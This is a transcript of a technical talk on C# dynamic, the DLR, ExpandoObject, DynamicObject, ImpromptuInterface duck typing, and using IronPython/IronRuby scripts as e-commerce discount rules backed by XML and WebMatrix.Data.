as well. If we said string quux instead, then it would do some dynamic casting to say, all right, well, this dynamic expression has now been evaluated, now let's try and make that a string. In this case, it would succeed. And so that's what you would see with IntelliSense. All right, so there are essentially two ways that dynamic is consumed. On one hand, you've got your existing static methods and behaviors, for example absolute value. It might seem ridiculous that you have to have eight different versions of absolute value just to say, if it's less than zero, make it positive. But indeed, we have a version for decimal, a version for double, a version for float. So we can also consume that dynamically. So if I've got a dynamic x, in this case initialized to two, so we know it's an integer, if we call Math.Abs, at runtime, and my arrow is in the wrong place here, it's going to figure out that we want the int version of absolute value.
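Before the overload-resolution example continues below, here is a small sketch of the conversion rules just described; this is illustrative only, not code from the talk's repo.

using System;

class DynamicConversions
{
    static void Main()
    {
        dynamic foo = "hello";           // implicit cast from a CLR type to dynamic
        string back = foo;               // implicit cast back, checked at runtime

        dynamic bar = "!";
        var quux = foo + bar;            // any expression involving dynamic is itself dynamic
        string asString = foo + bar;     // bound and converted at runtime; fine for two strings
        Console.WriteLine(asString);     // hello!

        dynamic number = 42;
        // string boom = number;         // compiles, but throws RuntimeBinderException at runtime
    }
}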
Similarly, if we have 1.75, that's a double, so we point in between double and float. Huh. Well, you get the point. So at runtime now, we're going to pick the correct version. This is called dynamic dispatch: at runtime, figuring out the behavior based on the methods available at the time. Now, what if we were to pass in "two", the string, instead? Now this dynamic dispatch is going to say, huh, we don't have an absolute value version for string, so we're just going to blow up. So: the best overloaded method match for Abs, and it just picks one of the overloads, has some invalid arguments. We don't know what to do, so it's just going to blow up. Rule number one of all this dynamic stuff: you need testing, because the compiler is not going to protect you in these situations. The Python and Ruby communities have really embraced testing. JavaScript people are figuring out that they should have done that a long time ago. And, you know, the .NET world isn't as good about that sort of stuff. With dynamic, you have to be, or your stuff's going to break. It can also go the other direction. So we can define methods that consume dynamic: make our own dynamic math class that has a single absolute value method, takes in a dynamic and returns a dynamic. This will succeed as long as we can compare to zero and we can do a negation. So we pass in a two, and it says, all right, two has a greater-than-or-equal-to-zero, two has a negation if we need it, in this case we don't. Similarly, we pass in a double, and it says, all right, a double can also be compared to an integer, the framework is smart enough to allow that. But again, if we pass in a string, we're going to get an error: greater-than-or-equal can't be applied between a string and a zero, or a string and an integer rather, which is what we would expect. So those are really the two directions you can work with the dynamic stuff. So now there are some caveats and limitations. One, you don't get much conversion and coercion. In those cases, some languages would say, all right, well, you're trying to compare a string to an integer, so let's either turn the integer into a string or vice versa. You do that same comparison in JavaScript and JavaScript will say, well, hey, that "2" looks like an integer, so I'll just turn it into an integer and compare two to zero. Oh, hey, we'll give you two back as the result. That's not the case in C#, or .NET in general. So any time we're taking foo and bar, adding those together and trying to cast the result as a string, that has to be explicitly supported. If we know that it's a string and a string, then converting that to a string makes sense. But if there wasn't a conversion to string defined on those objects, then we've got a problem. Also, with dynamic, you don't get extension methods. And if you were to try to extend dynamic, well, it won't even let you; you could try to extend object instead, but it doesn't work. Basically because extension methods are a compile time trick, but every dynamic expression is itself dynamic, so now we've got runtime evaluation of this kind of compile time trick that extension methods are. So those don't work. So working with LINQ is tricky. Basically you have to take whatever your dynamic stuff is and push it into an IEnumerable of something, maybe an IEnumerable of dynamic.
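A sketch of the two directions just walked through: consuming the static Math.Abs overloads dynamically, and a method that itself takes dynamic. DynamicMath is an assumed name, not necessarily the talk's; the LINQ workaround mentioned at the end picks up again right after this.

using System;

static class DynamicMath
{
    // Works for anything that supports >= 0 and unary minus; fails at runtime otherwise.
    public static dynamic Abs(dynamic x) => x >= 0 ? x : -x;
}

class AbsDemo
{
    static void Main()
    {
        dynamic a = 2;
        dynamic b = 1.75;
        Console.WriteLine(Math.Abs(a));            // dispatches to Math.Abs(int) at runtime
        Console.WriteLine(Math.Abs(b));            // dispatches to Math.Abs(double) at runtime

        Console.WriteLine(DynamicMath.Abs(-3));    // 3
        Console.WriteLine(DynamicMath.Abs(-2.5m)); // 2.5, decimal works too

        dynamic s = "two";
        // Math.Abs(s);         // RuntimeBinderException: no overload takes a string
        // DynamicMath.Abs(s);  // RuntimeBinderException: >= is not defined for string and int
    }
}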
And then you can say, all right, from d in my dynamic something, which is an IEnumerable of dynamic. And then within that, you can say where, do some dynamic thing, et cetera. Any questions so far? Okay. So when you write just a simple dynamic method, what goes on under the hood? So we're passing in a dynamic x, we're returning a dynamic incremented value. What does this actually turn into? Well, it turns into a whole lot of code, and be glad that you don't have to write this yourself. So what do we have here? Well, first at the top, we've got a couple of call sites. Call site caching is one of the performance enhancements that makes the DLR not a bad idea. Basically, once the runtime has figured out, the first time through, how to handle this sort of stuff, then going forward it says, all right, I'm probably going to be able to do the same kind of thing. You know, they're not going to keep passing in different kinds of stuff; it's probably going to be the same kind of object. So we've got call sites. So in increment, we're going to initialize the call site if it isn't already. And in the initialization, you'll notice Create, where we pass in an operation. For the first, we're doing a conversion operation, because we want to take the result of this dynamic expression and return it as an integer, so we've got to convert that result. And then the second is going to be a binary operation that uses ExpressionType.Add, because we said x plus 1. Finally, we say, all right, for our final result, we want to take the first call site, that's our conversion, and we pass into that the value from site two applied between x and 1. So that's the actual addition: site two's target with x and 1, that's the x plus 1. And then the outer operation is what then says, take that result at runtime and try and make it an integer again. So you'll notice that there was ExpressionType.Add. All of the DLR now, under the hood, uses expression trees. Expression trees have been around since .NET 3.5, but they were missing some things. Well, actually, they were missing a lot of things, a few of them actually necessary to represent all the valid expressions that you can write in C#. So things like plus-plus and minus-minus: even though they have side effects, there's also a result returned from them, and so they've added support for those to expression trees, to lambda expressions. In addition, they've added a whole bunch of new stuff. We've got assignment operators; those didn't used to be representable through expression trees, now they are. Control flow: ifs, switches, even goto. Not necessarily considered harmful, but usually. Dynamic dispatch: if we want to say, all right, here's an operation that we have to resolve at runtime, that also has to be representable in the expression trees. Add all that together, and everything that you can express with C# and VB is now representable through these full method bodies, or through these expression trees, rather. So when you're working in IronPython, it's just going to generate an expression tree. When you're working in IronRuby, it's just going to generate an expression tree. So for C#, this is the expression tree that's essentially generated behind the scenes. We pass in a dynamic n, and then we've got our dynamic if. The condition is defined using a dynamic equality comparison between the parameter and the constant, and then we've got the if-true and the if-false.
So if it's true, then we have a constant one. Otherwise, we do a multiply, we do a minus, and call ourselves again. So that's C#, very similar to what you see in Python. In Python, we've got a dynamic invoke to figure out how to call myself again. It's kind of interesting the way that Python views methods: it's going to go and look up the fact field in the global namespace, and then we call the minus. Ruby is even more different. There's a specific kind of Ruby method call that's treated differently than normal method calls, and then there's the parameter self. And yeah, these details don't really need to concern you. All you need to know is that IronPython and IronRuby work on the same machinery, with the same representation of that code. So that's the DLR. We've got the expression trees, we've got the call site caching, which is all generated by the compiler for you. We've got dynamic dispatch, which says at runtime, you asked me to do an add operation, figure out what I can do between all of those. Now the missing piece is to say, all right, let's build some dynamic CLR behavior. Let's build the dynamic XML, the dynamic data record, that kind of thing, so that we can take advantage of this functionality. So there are a few things that the .NET framework provides for you. The simplest is ExpandoObject. Essentially, it's just a dictionary that you can use dynamically. You can assign key value pairs and access those as normal properties. Interestingly, you can also assign a delegate to a property and use it as a method call. So if I assign a Func of int and string that returns a double or something, I can assign that to a property on my ExpandoObject and then call it, giving it an int and a string and returning a double, which is pretty neat. Going a step deeper, there's the DynamicObject base class that's provided for you. It provides a number of virtual methods that you can override: try to do a conversion operation, try to do a binary operation, try to do a method invocation, access by property, access by indexing with the square bracket thingies. All that stuff is exposed by your DynamicObject base class. So if you want to implement dynamic behavior, that's probably where I'd start. And if you're really hardcore, you can implement IDynamicMetaObjectProvider. That's what they do for you in DynamicObject and ExpandoObject. So all dynamic objects really just implement a one-method interface that says, given the expression you want evaluated, return me the result. Go. So if you wanted to implement an IronPython or an IronRuby, you essentially just have to make a whole bunch of objects that implement this meta object provider and return a DynamicMetaObject that has the behavior that you want it to have. So we're not going to look at the last one, but we are going to look at a library that does leverage it. And we are going to look at DynamicObject as well. So for the rest of the talk, we're just going to dive into some code. This is a bit.ly link that I've put together that packages up a whole bunch of interesting dynamic projects, including the Iron languages, a project called ImpromptuInterface by a guy from St. Louis, and a couple of other interesting things. So if you want to go check out that link, you can click around instead of paying attention to me. Any questions before we flip over to Visual Studio? No. Okay, let us do that then. So what do we have here?
So to start out with, we can just kind of show the simple dynamic behavior that we would expect. Here I've just made an array of a couple of things that have a Length property. So we've got strings, which have a length. We've got an array, which also has a length. This is a completely different kind of length, but it has it. And then we just make up an anonymous object. This isn't even a type that exists in our code, but it has a Length, so we would expect that to work. And then we also add three, just to see what happens for something that doesn't have a length. So if we run this, we see that we indeed got the length of "long". We got a length of two, we got a length of five. And then we get our "int does not contain a definition for Length". So that's the sort of runtime failure that you're going to have with dynamic. If we just said, hey buddy, give me a list of things with lengths, and they give us a three, well, we're going to get a runtime error. That's a problem. And the answer is not to just catch RuntimeBinderException and swallow it. Not good. We can, but don't, please. So that's the simple behavior. So what about operations? All operations are also going to be dynamically dispatched. So we've got a collection of some arbitrary x values and a collection of some arbitrary y values, and we're just going to try and add them together. So we've got a couple of ints, we've got a decimal, we've got a float, we've got now, and a time span. We'll just see what happens. So either we're going to catch the exception and spit it out, or we're going to return the result. So if we run that, that would not be the right one, we are going to run this one. Let's just check out what we got here. So starting with the ones: we can add a one to a two, to a three, one, four. We can't add one to a time span. That seems reasonable. One what? One second, one day, one minute. But we can add it to a string. So for the string, it figured out that we wanted string concatenation. Trying to add a string to everything works just fine. Adding a double to things generally works fine. Adding a double and a decimal together didn't work, which kind of surprised me. They're pretty similar, but they're not necessarily the same thing. I mean, which do you pick? If you add a double and a decimal, do you pick the double, because you already have that kind of lack of precision? Or do you pick the decimal? Because, yeah, I don't know. So they just blow up. And then down here, we see that you can actually add to a date time, and here we have 12 hours from now. And of course, string concatenation works as well. So operation resolution generally works pretty well, except it fails in the places that you would expect it to fail. So again, if you're just getting something out of Python or out of Ruby or out of a database, if you don't know the types of things, generally these operations might work. But if they don't, you're not going to find out until runtime. All right. So now let's actually work on building some dynamic objects in .NET. So I mentioned ExpandoObject. That's kind of your basic key value pair thing, essentially similar to a JavaScript object. You can assign properties and get the result back out. So here we're going to say, all right, give me an ExpandoObject. Let's set its name to Keith. And of course, that will work. And then we can also say, all right, give me a function that takes in an integer and returns an integer. Just add one to it.
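A rough reconstruction of the length demo described at the start of this section; the exact values differ from the talk's repo, and the ExpandoObject demo continues right below.

using System;
using Microsoft.CSharp.RuntimeBinder;

class LengthDemo
{
    static void Main()
    {
        // Strings and arrays have a Length, the anonymous object has one too, the int does not.
        var things = new object[] { "long", new[] { 1, 2 }, new { Length = 5 }, 3 };

        foreach (dynamic thing in things)
        {
            // Catching and printing the binder exception mirrors the demo; don't swallow these in real code.
            try { Console.WriteLine(thing.Length); }
            catch (RuntimeBinderException e) { Console.WriteLine(e.Message); }
        }
    }
}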
So here then we can call it. If I hover over ex here, it's going to say it's a local dynamic variable. At compile time, we don't know what the result of that's going to be. It's just object, essentially. But if we run that, as expected, we see Keith. We can also make changes after the fact. So now my name is Bob. And if we run that, so this is very, very simple. There's no sort of write once, read only after that. Very, very simple behavior. So that's ExpandoObject. Useful for some things. I believe they use ExpandoObject for the ViewBag in MVC 3, which is essentially ViewData, but it does this kind of stuff for you instead of having to do strong casting and stuff. So I mentioned ImpromptuInterface. What if you want to build a more sophisticated dynamic object? What if you want to build a dynamic object that has array-like behavior or something like that? ImpromptuInterface includes a builder for you. It's kind of similar to Clay, which is a project that came out of the Orchard CMS. The pattern that they both use is that you basically give yourself a dynamic factory, and the convention is to call it New. So we say, all right, give ourselves a new builder and make it dynamic. So now this New implements some dynamic behavior that says, all right, when I say New.Person, here I can pass in a couple of arguments using kind of the named parameter syntax. So his name is Robert Paulson. We can also use methods to assign things. So on that new person, we're also going to say the age is 42. You can pass in delegates very similar to the ExpandoObject. So here we're going to say, all right, give me a function that returns void that just calls for Trogdor. And then finally, we're going to add a greeting method that returns a string. Interesting difference here: instead of just saying arguments, we say this-and-arguments. So this-and-arguments is going to give us the dynamic instance first, but then also let us pass in the greeting parameter. And then the result is a string, as we'd said before. So if we run this, we'll see that his name is Robert Paulson. We access the first name, last name, age, and call the greeting method. We asked him to sing. So far, so good.
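Roughly the ExpandoObject part of the demo just described, reconstructed rather than copied from the repo.

using System;
using System.Dynamic;

class ExpandoDemo
{
    static void Main()
    {
        dynamic ex = new ExpandoObject();
        ex.Name = "Keith";                          // properties are just key/value pairs
        ex.AddOne = (Func<int, int>)(x => x + 1);   // a delegate-valued property is callable like a method

        Console.WriteLine(ex.Name);                 // Keith
        Console.WriteLine(ex.AddOne(41));           // 42

        ex.Name = "Bob";                            // nothing stops you from changing it later
        Console.WriteLine(ex.Name);                 // Bob
    }
}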
So we've got a duck-type greeter, and we're going to say that he's a clean coder. So now if we run this, you'll notice that Robert Martin is our clean coder. So this duck typing, it's not wrapping it in a proxy or anything like that. This is the same instance. We're changing this Robert Paulson instance to now be Robert Martin. And then treating it as a completely separate interface and saying, now give me a greeting. And it says that I'm Uncle Bob the clean coder. I think that's pretty cool. So imagine you had, say, an XML file. We build up a little library to pull stuff out of that XML file dynamically. So I work in e-commerce. Let's just do it. So we've got our discounts. So this is just an XML file that we're going to want to parse out and use. So we've got, I just kind of made up a scenario. So each discount has an ID. Each discount has a code that our customers are going to put in. And then I thought, it'd be pretty neat if instead of having to build this dynamic logic into, or build the discount logic into our app, I'd rather give the marketing people flexibility to say, you define the discount, you define eligibility. If this person orders an odd number of things, we should be able to give them a discount. We don't want to have to build that into our app. I just want to say, all right, you give me a bit of Python and I'll turn that into a validation. So we say, all right, well, for this, we're going to have Python. Here's a little Python script that just says return true all the time. We're going to let it expire. Here's a different Python for false. Here's a Ruby one that says, if it's a bigger order with more than five items, then we want to consider this discount to be valid. So how would we take this and consume it dynamically? So there are a couple, so I've implemented a couple of different interesting things. So let's start with kind of our standard XML, all right. So we've got an XML discount repository. So there's a base class which doesn't really have anything particularly interesting in it. But we want to be able to say, all right, give me a list of discounts given an XML document. All right, so this is how you do this today. So you would say, all right, so from the discount elements in my document, make me a new discount. Discount actually takes in dynamic here just to be interesting. But that doesn't really matter. So we're saying, build me up a discount, and for that discount, I need an ID, I need a code, I need an expiration. So we're manually mapping from these XML elements to a.NET version of the same type. We also have to be explicit here that ID is an int, that code is a string, that expiration is an optional date time. This is all very tedious, prone to error. You'd have integration tests that parse through the file, make sure that everything is valid. This is not a great way to be. So let's look at the dynamic version instead. So all of that, that as dynamic. I prefer that. I think that's less code. So let's take a look at as dynamic. So dynamic now, we're just saying, all right, given an x element, make me a new dx element, and we'll run from there. dx element implements or inherits from dynamic object. That's the middle one that I mentioned that provides base classes for you. So for this dx element, we're now going to say, all right, when somebody accesses a property on me, I want you to try and find an element with that name. So this is what that looked like. So try get member is kind of the structure of all the dynamics. 
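Backing up to the duck-typing demo for a moment, here is a hedged sketch of the same idea using an ExpandoObject in place of the builder object from the talk. It assumes, as the demo shows, that ImpromptuInterface will dispatch a delegate-valued member as an interface method:

```csharp
using System;
using System.Dynamic;
using ImpromptuInterface;

public interface IPerson
{
    string FirstName { get; }
    string LastName { get; set; }
}

public interface IGreet
{
    string Greet(string greeting);
}

class DuckTypingSketch
{
    static void Main()
    {
        // Any dynamic object with matching members will do.
        dynamic person = new ExpandoObject();
        person.FirstName = "Robert";
        person.LastName = "Paulson";
        person.Greet = (Func<string, string>)(g =>
            string.Format("I'm {0} {1}, the {2}", person.FirstName, person.LastName, g));

        // Same instance, viewed through two different static interfaces.
        IPerson typed = Impromptu.ActLike<IPerson>(person);
        typed.LastName = "Martin";

        IGreet greeter = Impromptu.ActLike<IGreet>(person);
        Console.WriteLine(greeter.Greet("clean coder")); // I'm Robert Martin, the clean coder
    }
}
```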
If we come up here, we can say override. You see there are a bunch of them. Try binary operation. Try create instance. Try delete member, which you can't do in.NET, but you can in Python, I think. I don't think I'm not sure if you can. I don't know. One of the dynamic languages supports deleting members, even though we can't. So there are a whole bunch of operations that you can implement. So we implement two. One, try getting a member. So if the element that was passed into us exists, then try and find an element with the name that was provided. And then let's treat that element dynamically, because that element might have other elements in it, or it might just be a value. In this case, it's, these are values, so we also need to now support conversion. So this is not a trivial implementation, but essentially we just say here, if somebody asks us to convert this x element into some other type, maybe an integer or a string, this is how we're going to do it. X element has built into it a whole bunch of casting behaviors, so you can do an explicit cast to string or to decimal or any of that stuff, and the x element class will behave as expected. So we just say, all right, given an x element, return me, given a string, cast me as a string, date time to date time, and to int, et cetera. So this is just very, very simple dynamic XML mapping using the dynamic object base. But that's all we need. So we, so looking back at the XML repository, we're just saying for each discount element in our thing, you'll notice we have to kind of work around the whole XML or the link limitation with dynamic, but we say, all right, give me all the discount elements. Now for each discount element, make a new discount out of me consumed dynamically. Yeah? So consuming dynamically, let's go ahead and take a look at discount then. So in discount, we're just saying, I'm a dynamic. Give me something, and I'm going to assume that something has an ID, it has a code, it has an expiration date, and then it has a script type and a validation script. The explicit casts here are to get around some weird binding issues. Yeah, and then get validator from script just as if it's Python, use Python if it's Ruby, use Ruby. Otherwise, I do not speak Klingon. Not going to dive into this, but just so you can see it, that's all it takes to say, pull a function out of Python. Pull a function out of Ruby. And it just automatically turns it into a.NET delegate that we can call. Yeah, so we're saying, give me a script, and then we're pulling out, we just assume that they're going to define an is valid method. So you give me a block of script that has an is valid method, and that could even call other methods earlier up in the script. You can give me a thousand lines of code here if you wanted to. But I'm just going to export is valid, and then return that, no casting or anything, return that as a function given an order. Note that your dynamic stuff isn't going to be aware of what an order is. We just know that an order has a number of items, it has total price, that kind of thing. So we're going to give you an order, and you're going to give us a Boolean. So just treat this is valid as if it were this.NET dynamic delegate, and then we return those. And so that we assign then to the is valid function here, which we can use externally as if it were just a method. There's expiration date. Any questions about this so far? Okay. So we've got our dynamic X element. Let's see this in action. We're just going to skip over curing for now. 
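A stripped-down sketch of the dynamic XML wrapper just described; it is not the speaker's exact DXElement, only the TryGetMember/TryConvert shape of it. Given dynamic d = new DynamicXElement(discountElement), property access such as d.Code walks into child elements, and assigning the result to an int or string triggers TryConvert:

```csharp
using System;
using System.Dynamic;
using System.Xml.Linq;

// Expose child elements as properties and let an element convert itself to simple CLR types.
public class DynamicXElement : DynamicObject
{
    private readonly XElement element;

    public DynamicXElement(XElement element)
    {
        this.element = element;
    }

    public override bool TryGetMember(GetMemberBinder binder, out object result)
    {
        // Property access becomes a lookup of a child element with the same name.
        var child = element == null ? null : element.Element(binder.Name);
        result = new DynamicXElement(child);
        return true;
    }

    public override bool TryConvert(ConvertBinder binder, out object result)
    {
        // XElement already defines explicit casts to the common primitives; reuse them.
        if (binder.Type == typeof(string))    { result = (string)element;    return true; }
        if (binder.Type == typeof(int))       { result = (int)element;       return true; }
        if (binder.Type == typeof(int?))      { result = (int?)element;      return true; }
        if (binder.Type == typeof(DateTime?)) { result = (DateTime?)element; return true; }
        result = null;
        return false;
    }
}
```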
So in the simple case, we just want to say, all right, so here's some Python, some script. So we go ahead and define at our is valid function, and then we say, all right, if there are two items, then we'll call this valid. And then we go ahead and make ourselves an anonymous type that has all of the things that discount is expecting. So these don't have to be dynamic things. It doesn't have to be dynamic XML or any of that. It can just be a normal.NET object. This is just a kind of standard parameter object pattern. So we pass in, it has an ID, a code, et cetera. We pass that into new discount, and then I just don't find a dump extension method that runs that discount up against some sample orders. So we run this and we see, hey, discount two is valid for in order with two items, but is not valid for in order with seven or 10 items. So just to prove, I mean, I hope you trust me, but just to prove that it's actually working, so now it's valid for 10 items instead of two. I think this is pretty neat. I work in e-commerce. I'd like to be able to not have my discount rules hard coded into our normal.NET side of the app. So if we can make those rules a little bit more flexible, make them more dynamic, what's not to like? So that's just for a single discount. So now, showing that it works for our just kind of statically manipulated XML library. So we've got an all discount, the none discount, the big, none is valid for nothing, big is valid for greater than five. So everything works there. Now we can run the same using our dynamic XML repository. Ta-da. Come on, no applause. Oh, come on, you can do better than that. So that's just treating everything as dynamic here. So what concerns me is that in discount, everything is dynamic. So discount is basically a low level domain kind of concept. And I'm not really comfortable having dynamic seep all the way down in there. All right, true. We'll take that there's dynamic stuff involved with the Python and Ruby, but I'd really like to have discount depend on something concrete instead. So what if we could come in here instead and say, all right. Now we'll just go ahead and leave that existing overload. I always say overlord. I don't know what that says about me. So let's instead say that discount takes an I discount definition, which just happens to be defined as matching the contract that we're expecting. So now, and I'm just going to leave the dynamic version in here because it's relied on elsewhere in the code. So now we can essentially say, all right, discount of dynamic is actually, huh. Okay. I've never actually tried doing it that way. All right, so we'll just do it a different way instead. All right, so let's just replace the dynamic constructor with the I discount definition. So now if we compile, we would expect that it's going to blow up. Excuse me, because there are a couple of places that we use that we use it dynamically. So here we could say, all right, so let's make this a say var and then act like is an extension method. So if, you know, so this is a statically typed thing. It just happens to be an anonymous object. So it doesn't have a type that we can name, but we can still say, hey, you should act like a discount definition and then pass that into discount. So that's one option. So now we've got real, real duck typing. You give me a something and I'll just say treat it as an enumerable. Even if it doesn't implement I enumerable of T, if it has a method that says, get me an enumerator, we're good enough. 
All right, so that fixes that case. In our XML repository here, let's do the same thing act like I discount definition, pull that in. There's going to be one in our dynamic. So this dot as dynamic dot act like I discount definition. Oh, haha. So you can't use extension methods when it's dynamic. So let's instead say impromptu interface impromptu dot act like excuse my Vimfoo here. Not meaning it to be distracting. All right, so we actually have to do a, I'll just import that to make it smaller. All right, so now we're saying make me a discount with our dynamic XML here. Acting like an I discount definition. So because it's dynamic, we can't use extension methods. We just call it impromptu act like instead. And now let's just go quickly fix up. We can get something by code in our massive example, which we'll talk about later. Act like I discount definition. And then finally, oh hey, it succeeded. All right, so now if we flip back to our program, we can run this. And we'll see that indeed, you know, so now our domain model doesn't have any notion that we're using dynamic stuff out, you know, kind of behind the scenes. It just knows that I got a discount definition. Now we're taking this dynamic data access stuff, avoiding all the tedious mapping from strings and casting and elements versus attributes. I mean our dynamic XML element here, we could make that smarter. We could say, all right, first check if there's an attribute. If there's not an attribute, then check if there's an element. Oh hey, there are more than one elements. Let's return something that will either behave as one if you cast it as a string and into a string or it can behave as a collection if we want it to. So this is just smarter casting and smarter implementations of that get member and that kind of thing. All right, so this is just scratching the surface. There's actually a project out on GitHub that I started and have completely abandoned, but I'm still interested in if anyone wants to help. I just called it DNXML or something like that to essentially try and make a smarter version of this dynamic X element. So we'll say, hey, check here an attribute, check for an element, et cetera. So again, our domain model now doesn't have this notion of a discount definition. We just say, regardless of what you feed me, I just need to know how to build myself. Yes, sir? What do you use acts like if you get the exception straight away, it doesn't even recognize the use? That's a good question. So the question was, when you're using act like, if it doesn't fulfill the contract, what happens? I have no idea. All right, so there are two ways that it could fail. Either we've got extra functionality. Well, we've already seen that because I greet. We had a greet method, but there was other stuff and we just kind of ignored that. So the real question is what happens if we just don't have an ID? We're saying, here's some discount parameters, have it act like a discount definition. Boom. All right. So the runtime binder. Okay, so I'm going to delete a different one because I don't think it was impromptu interface blowing up. Maybe it is. All right, so get expiration. Oh, okay. Okay, yeah. So the answer is, here let me pull that up again. So the exception that we're getting is that our anonymous type of int string, string, string does not contain a definition for expiration date. So behind the scenes impromptu interface is just saying, all right, you said that you are a discount definition. 
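In miniature, the distinction just hit in the demo: the ActLike extension method is fine on a statically typed receiver, but extension methods are not considered during dynamic dispatch, so for a dynamic value you call the static Impromptu.ActLike directly. IDiscountDefinition here is a cut-down stand-in for the real interface:

```csharp
using ImpromptuInterface;

public interface IDiscountDefinition
{
    int Id { get; }
    string Code { get; }
}

static class ActLikeCallSites
{
    // Statically typed receiver: the ActLike extension method resolves at compile time.
    public static IDiscountDefinition FromStatic(object parameters)
    {
        return parameters.ActLike<IDiscountDefinition>();
    }

    // Dynamic receiver: extension methods do not take part in dynamic dispatch,
    // so call the static helper on the Impromptu class instead.
    public static IDiscountDefinition FromDynamic(dynamic row)
    {
        return Impromptu.ActLike<IDiscountDefinition>(row);
    }
}
```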
So I'm just going to spit out the call site caching, all that call site stuff. That's essentially what impromptu interface is spitting out behind the scenes. So it's turning your request for expiration date into a request for expiration date from the object that you passed in. So then the runtime says, all right, well, you said that you could handle this, but you clearly can't. Liar. So testing is the answer. But yeah, good question. Any other questions? Follow-up question? Yes, sir. Yeah, absolutely. So the question was, so if you have to inherit from a base class that should have implemented an interface but didn't. So suppose that I have something that it has an add and a remove, and it implements I enumerable, but it doesn't implement I collection. And we want to treat it as an I collection because it can do everything a collection can do. It just doesn't have it. Yeah, you can absolutely say, act like an I collection. And it just goes. Which is pretty neat. Or something that doesn't implement I enumerable. If you had to get enumerator. I'm not sure why you would do one without the other. But that's the sort of stuff that this enables. I don't know. This stuff is, there are a lot of use cases that we're not going to be able to touch on here. I think it's pretty darn interesting. Any other questions about what we've seen so far? Yes, sir. Yes. Yes. Yes. Yes. Yes. Yes. Yes. Yeah. So the point that was made is that if, you know, so here we're using expiration date. It only fails when we try to use expiration date. So if we come over to our discount and just get rid of that line, now we can flip back to the program and I expect this will pass. Because even though we said act like a discount definition, we never used a part of you that's missing. So I mean, so you could just say, all right, well, make an interface for identifiable that just assumes you have an ID that returns an integer. Regardless of the rest of the stuff, now we've got something that's identifiable and we can write functionality that uses that one assumption even if we don't have anything that explicitly implements identifiable. So an obvious next question is what about performance? So this is where all that call site caching and whatnot comes in. These are native.net objects. So this is a very quick decision for the runtime here to say, hey, do you have an expiration date? Yeah, it turns out you do. Cool. And it just goes on its merry way. And it remembers how it resolved that in the first place so that the next time it doesn't have to go and look it up again. It just says, this is probably a.net object, a CLR object. So I'll try that. That fails, then it'll fall back and use smarter logic. Yeah? Okay, so we've looked at dynamic XML. We've looked at pulling that in. We've got the interop with Python and Ruby. So what about other data sources? So XML is all well and good, but most of your stuff is probably in SQL or a no-RM kind of data store. So starting with webmatrix.data, which is a project that Microsoft included in Web Matrix, why they included it in Web Matrix, I'm not really sure. It's kind of a neat standalone thing. So they implemented the idea that you can just say, give me a SQL query and I'll return you a dynamic, or a list of dynamics, an Ionium or both dynamic, that exposes essentially your data records, but handles all the casting and everything for you. So they went ahead and implemented that and consuming that looks like this. 
So if we wanted to say, get a discount given a code, so we could say select the top one from discounts where the code equals blah, does support parameterized SQL, so we just pass in now query single. Here's the SQL, here's the code, that's the one parameter that we passed in, and then out we get a dynamic result. Oh, hey, this is going to fail because we need an act like. Let's see it fail first. Just for, actually no, this won't fail. Well, we're not even going to exercise this, but this is how this, so this is, I apologize, I'm a little confused. So this is kind of what it looks like to consume the web matrix stuff. So querying out a single record, querying out multiple records, and then the result here is just, so query returns an Ionium or a bulk of dynamic, and then we say take each of those and return me a new discount. So we can, I think that was right, the matrix discounts. So if we try running this, it should fail. Ah, best overload didn't match. But note that's a runtime error because it's a dynamic expression and not. So here we can say impromptu, act like, I discount definition, and then now we pass in a row. Now that's going to work. All right, so now, no hand waving. This is a completely separate data store. We've got a database that has, and even it has an odd discount in it. And so we pull it out and it's got the Python and you'll, you know, indeed the logic is correct. We can actually even then go and test, you know, these library support wrapping as well. So in web matrix, in web matrix dot data, this is how you might do an insert kind of method. So we've got a save, we've got our query, insert into discounts with code, validation script, et cetera. And then we pass in the values. So we cast our code as a string, we cast our validation script as a string. Oh, that's because save here is dynamic. What if, because that could really be a discount definition. Now we've got to go update our idiscount writer, idiscount definition. So now we don't need any of the casting because we know the type of the thing. And yeah, regardless, you know, so now if I come over into my program and I try act like an idiscount definition and it blew up. Oh, that's because our other repositories do not implement saving. All right, so there's that. And what was the last one? If you haven't guessed, we're also going to look at a couple other ORM type solutions. All right, so there's save that also has an idiscount definition. All right, cool. So we come back to our program. We run this. All right, that says that it passed. It didn't actually output anything. So now if I come up here and look at our web matrix data, we should see now that there's a seven discount that's been added that says it's valid if it's seven and otherwise not. All right, so we can use this to dynamically pull records out to dynamically push records in. Let's take a closer look at the way that we were actually doing that, that insertion with web matrix here. Well so this isn't particularly interesting because we actually have to enumerate out the parameters. So web matrix is one option. Well when web matrix was released, there was some people, I guess, kind of disagreed. First problem, the posts they put out didn't use parameterized SQL, it used string concatenation. Apparently they were targeting the PHP audience. So some people said, this is not what we want. So a couple people said, we're going to make our own. One of those was Rob Connery, he made a project called Massive. 
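Before moving on to Massive, here is roughly what the WebMatrix.Data repository just walked through boils down to. The connection string name, the table layout and the interface are assumptions made to keep the sketch self-contained:

```csharp
using System.Collections.Generic;
using System.Linq;
using ImpromptuInterface;
using WebMatrix.Data;

public interface IDiscountDefinition
{
    int Id { get; }
    string Code { get; }
    string ValidationScript { get; }
}

public class WebMatrixDiscountRepository
{
    public IDiscountDefinition GetByCode(string code)
    {
        using (var db = Database.Open("DynamicDemo"))
        {
            // Parameterised SQL; the row comes back as a dynamic record.
            var row = db.QuerySingle("select top 1 * from Discounts where Code = @0", code);
            return Impromptu.ActLike<IDiscountDefinition>(row);
        }
    }

    public IEnumerable<IDiscountDefinition> GetAll()
    {
        using (var db = Database.Open("DynamicDemo"))
        {
            return db.Query("select * from Discounts")
                     .Select(row => (IDiscountDefinition)Impromptu.ActLike<IDiscountDefinition>(row))
                     .ToList();
        }
    }

    public void Save(IDiscountDefinition discount)
    {
        using (var db = Database.Open("DynamicDemo"))
        {
            db.Execute("insert into Discounts (Code, ValidationScript) values (@0, @1)",
                       discount.Code, discount.ValidationScript);
        }
    }
}
```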
